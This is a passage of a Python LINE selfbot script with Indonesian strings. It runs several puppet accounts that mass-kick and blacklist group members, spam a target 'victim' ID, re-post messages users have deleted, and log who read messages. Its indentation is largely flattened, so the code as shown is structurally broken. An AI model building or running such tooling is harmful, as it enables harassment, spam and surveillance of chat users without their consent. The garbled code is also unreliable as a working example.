"「✭」 " + key + "Cek pesan \n" + \
"「✭」 " + key + "Cek respon \n" + \
"「✭」 " + key + "Cek leave\n" + \
"「✭」 " + key + "Cek welcome\n" + \
"「✭」 " + key + "Set sider:「Text」\n" + \
"「✭」 " + key + "Set spam:「Text」\n" + \
"「✭」 " + key + "Set pesan:「Text」\n" + \
"「✭」 " + key + "Set respon:「Text」\n" + \
"「✭」 " + key + "Set leave:「Text」\n" + \
"「✭」 " + key + "Set welcome:「Text」\n" + \
"「✭」 " + key + "Myname:「Nama」\n" + \
"「✭」 " + key + "Bot1name:「Nama」\n" + \
"「✭」 " + key + "Bot2name:「Nama」\n" + \
"「✭」 " + key + "Bot3name:「Nama」\n" + \
"「✭」 " + key + "Bot4name:「Nama」\n" + \
"「✭」 " + key + "Bot5name:「Nama」\n" + \
"「✭」 " + key + "Bot1up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot2up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot3up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot4up「Kirim fotonya」\n" + \
"「✭」 " + key + "Bot5up「Kirim fotonya」\n" + \
"「✭」 " + key + "Gift:「Mid korban」「Jumlah」\n" + \
"「✭」 " + key + "Spam:「Mid korban」「Jumlah」\n" + \
"\nKetik「 Refresh 」jika sudah\nmenggunakan command diatas...\n"
return helpMessage1
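# Main operation dispatcher. Judging from how they are handled below, the op.type
# codes appear to correspond to: 5 contact added, 11 group settings/QR updated,
# 13 invited into group, 15 member left, 17 member joined, 19 member kicked,
# 25/26 message sent/received, 32 group invitation cancelled, 55 read receipt,
# 65 message unsent.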
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 11:
if op.param1 in protectqr:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
cl.updateGroup(X)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = ki.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
ki.updateGroup(X)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kk.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(X)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kc.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(X)
except:
try:
if km.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.reissueGroupTicket(op.param1)
X = km.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = km.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
km.updateGroup(X)
except:
try:
if kb.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.reissueGroupTicket(op.param1)
X = kb.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kb.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kb.updateGroup(X)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Sorry anda bukan admin selfbot\nSelamat tinggal " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " +str(ginfo.name))
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " + str(ginfo.name))
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
km.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
km.leaveGroup(op.param1)
else:
km.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
km.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Emid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kb.leaveGroup(op.param1)
else:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(ABC).cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
                if op.param2 not in Bots:
                    ginfo = cl.getGroup(op.param1)
                    contact = cl.getContact(op.param2).picturePath
                    image = 'http://dl.profile.line.naver.jp'+contact
                    welcomeMembers(op.param1, [op.param2])
                    cl.sendImageWithURL(op.param1, image)
if op.type == 15:
if op.param1 in welcome:
                if op.param2 not in Bots:
                    ginfo = cl.getGroup(op.param1)
                    leaveMembers(op.param1, [op.param2])
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
sendMention(op.param1, op.param1, "Haii ", ", terimakasih sudah add saya")
cl.sendText(op.param1, wait["message"])
cl.sendContact(op.param1, "ue6d8f9ef8f820fad9c65bbb5d1ec714b")
if op.type == 5:
print ("[ 5 ] NOTIFIED AUTO BLOCK CONTACT")
if wait["autoBlock"] == True:
cl.blockContact(op.param1)
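        # Unsend handler: when a message is retracted, re-post the cached copy from
        # msg_dict / msg_dict1, which are filled by the message handler further below.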
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict:
if msg_dict[msg_id]["from"]:
if msg_dict[msg_id]["text"] == 'Gambarnya dibawah':
ginfo = cl.getGroup(at)
ryan = cl.getContact(msg_dict[msg_id]["from"])
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Gambar Dihapus 」\n• Pengirim : "
ret_ = "• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(at, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
cl.sendImage(at, msg_dict[msg_id]["data"])
else:
ginfo = cl.getGroup(at)
ryan = cl.getContact(msg_dict[msg_id]["from"])
ret_ = "「 Pesan Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(ryan.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n• Pesannya : {}".format(str(msg_dict[msg_id]["text"]))
cl.sendMessage(at, str(ret_))
del msg_dict[msg_id]
except Exception as e:
print(e)
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
ginfo = cl.getGroup(at)
ryan = cl.getContact(msg_dict1[msg_id]["from"])
ret_ = "「 Sticker Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(ryan.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
ret_ += "{}".format(str(msg_dict1[msg_id]["text"]))
cl.sendMessage(at, str(ret_))
cl.sendImage(at, msg_dict1[msg_id]["data"])
del msg_dict1[msg_id]
except Exception as e:
print(e)
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
try:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
if op.type == 19:
try:
if op.param1 in protectantijs:
if op.param3 in mid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                            sw.acceptGroupInvitation(op.param1)
                            G = sw.getGroup(op.param1)
                            G.preventedJoinByTicket = False
                            sw.updateGroup(G)
                            Ticket = sw.reissueGroupTicket(op.param1)
                            cl.acceptGroupInvitationByTicket(op.param1,Ticket)
                            sw.kickoutFromGroup(op.param1,[op.param2])
                            G.preventedJoinByTicket = True
                            sw.updateGroup(G)
                            wait["blacklist"][op.param2] = True
                            sw.leaveGroup(op.param1)
                            cl.inviteIntoGroup(op.param1,[Zmid])
                            cl.inviteIntoGroup(op.param1,admin)
else:
pass
if op.param3 in Zmid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
else:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[Zmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if op.param3 in admin:
if op.param1 in protectantijs:
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.sendMessage(op.param1,"=Admin Invited=")
else:
pass
except:
pass
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Amid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Bmid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Cmid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Dmid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
            if Emid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if op.type == 19:
if op.param3 in admin:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
except:
pass
return
if op.type == 19:
if op.param3 in staff:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
except:
pass
return
if op.type == 55:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.param1 in Setmain["readPoint"]:
if op.param2 in Setmain["readMember"][op.param1]:
pass
else:
Setmain["readMember"][op.param1][op.param2] = True
else:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
sider = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+sider
cl.sendImageWithURL(op.param1, image)
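        # Per-message enforcement: kick blacklisted or talk-banned senders and react
        # when an admin is tagged (auto-reply or kick, depending on the toggles).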
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if msg._from in wait["blacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
                if 'MENTION' in msg.contentMetadata:
if msg._from not in Bots:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
contact = cl.getContact(msg._from)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in admin:
saints = cl.getContact(msg._from)
sendMention(msg._from, saints.mid, "", wait["Respontag"])
cl.sendImageWithURL(msg._from,image)
break
                if 'MENTION' in msg.contentMetadata:
if msg._from not in Bots:
if wait["mentionKick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in admin:
cl.sendMessage(msg.to, "Jangan tag saya ogeb...")
cl.kickoutFromGroup(msg.to, [msg._from])
break
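        # Message handler: caches text/images/stickers for unsend detection, inspects
        # shared posts/contacts/stickers, stores uploaded media for the add-image/video/
        # sticker/audio commands, then falls through to the prefixed text commands.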
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 2:
if msg.toType == 0:
to = msg._from
elif msg.toType == 2:
to = msg.to
if msg.contentType == 16:
if wait["Timeline"] == True:
ret_ = "「 Detail Postingan 」"
if msg.contentMetadata["serviceType"] == "GB":
contact = cl.getContact(sender)
auth = "\n• Penulis : {}".format(str(contact.displayName))
else:
auth = "\n• Penulis : {}".format(str(msg.contentMetadata["serviceName"]))
ret_ += auth
if "stickerId" in msg.contentMetadata:
stck = "\n• Stiker : https://line.me/R/shop/detail/{}".format(str(msg.contentMetadata["packageId"]))
ret_ += stck
if "mediaOid" in msg.contentMetadata:
object_ = msg.contentMetadata["mediaOid"].replace("svc=myhome|sid=h|","")
if msg.contentMetadata["mediaType"] == "V":
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
murl = "\n• Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
murl = "\n• Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(object_))
ret_ += murl
else:
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
ret_ += ourl
if "text" in msg.contentMetadata:
text = "\n• Tulisan : {}".format(str(msg.contentMetadata["text"]))
purl = "\n• Post URL : {}".format(str(msg.contentMetadata["postEndUrl"]).replace("line://","https://line.me/R/"))
ret_ += purl
ret_ += text
cl.sendMessage(to, str(ret_))
                        # build the post URL for auto-like/comment; assumes the same
                        # "line://" -> "https://line.me/R/" rewrite used for purl above
                        url = str(msg.contentMetadata["postEndUrl"]).replace("line://","https://line.me/R/")
                        channel.like(url[25:58], url[66:], likeType=1006)
                        channel.comment(url[25:58], url[66:], wait["message"])
if msg.contentType == 0:
msg_dict[msg.id] = {"text":msg.text,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 1:
path = cl.downloadObjectMsg(msg_id)
msg_dict[msg.id] = {"text":'Gambarnya dibawah',"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
stk_id = msg.contentMetadata["STKID"]
stk_ver = msg.contentMetadata["STKVER"]
pkg_id = msg.contentMetadata["STKPKGID"]
ret_ = "\n\n「 Sticker Info 」"
ret_ += "\n• Sticker ID : {}".format(stk_id)
ret_ += "\n• Sticker Version : {}".format(stk_ver)
ret_ += "\n• Sticker Package : {}".format(pkg_id)
